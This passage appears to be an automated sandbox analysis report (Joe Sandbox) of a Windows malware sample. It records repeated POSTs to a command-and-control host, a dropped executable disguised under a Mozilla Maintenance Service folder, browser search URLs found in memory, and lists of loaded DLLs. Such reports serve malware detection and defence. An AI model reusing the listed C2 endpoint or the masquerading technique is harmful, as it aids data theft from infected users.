                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 1920Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2596Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: h172956.srv11.test-hf.suContent-Length: 2592Expect: 100-continueConnection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: h172956.srv11.test-hf.su | Content-Length: 1920 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: h172956.srv11.test-hf.su | Content-Length: 2596 | Expect: 100-continue
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: h172956.srv11.test-hf.su | Content-Length: 1892 | Expect: 100-continue | Connection: Keep-Alive
                          Source: global traffic | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: h172956.srv11.test-hf.su | Content-Length: 2592 | Expect: 100-continue
                          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown | DNS traffic detected: queries for: h172956.srv11.test-hf.su
                          Source: unknown | HTTP traffic detected: POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 | Host: h172956.srv11.test-hf.su | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000351B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su/
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000538D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.00000000055E7000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005781000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000443D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005427000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000005929000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000003F1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.000000000547C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su/providerVmjs_PollAuthapiBasecdndownloads.php(gI
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://h172956.srv11.test-hf.su8
                          Source: hyperbrokerhostNetsvc.exe, 00000006.00000002.2304908980.0000000003BB7000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3259059706.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013434000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014F55000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000014FAC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000150EC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000013F6D000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.000000001472A000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.00000000133DC000.00000004.00000800.00020000.00000000.sdmp, vVSUwBXtljAfFANPiZBBPFzlgh.exe, 0000000C.00000002.3355893743.0000000012B72000.00000004.00000800.00020000.00000000.sdmp, 1A3xZKobjV.12.dr, yLbRMBQSN5.12.dr, gvAKM0fLhk.12.dr, iErAbyc3M5.12.dr, 8yAXZKSYXg.12.dr, pwL7dW8qS0.12.dr, 8J9Zbopzzz.12.dr, D3mg9YhQBx.12.dr, EoXjdnWCT9.12.dr, B9jB8Guobv.12.dr, yK7ksGTIPk.12.dr, PQay6onHRJ.12.dr, s3rECp1tL8.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Window created: window name: CLIPBRDWNDCLASS

                          System Summary

Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: 0_2_007C6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AyILZeLM.log 4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: String function: 007DF5F0 appears 31 times
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: String function: 007DEC50 appears 56 times
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Code function: String function: 007DEB78 appears 39 times
Source: C:\Users\user\Desktop\hT7clR9Gz2.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll, <pi-ms-win-core-fibers-l1-1-1.dll, <pi-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, policymanager.dll, msvcp110_win.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, gpapi.dll, windows.storage.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll, apphelp.dll
Source: C:\PortCommon\hyperbrokerhostNetsvc.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, ntmarta.dll, uxtheme.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, winnsi.dll
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, wbemcomn.dll, amsi.dll, userenv.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: mmdevapi.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: ksuser.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: avrt.dllJump to behavior
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exeSection loaded: audioses.dllJump to behavior
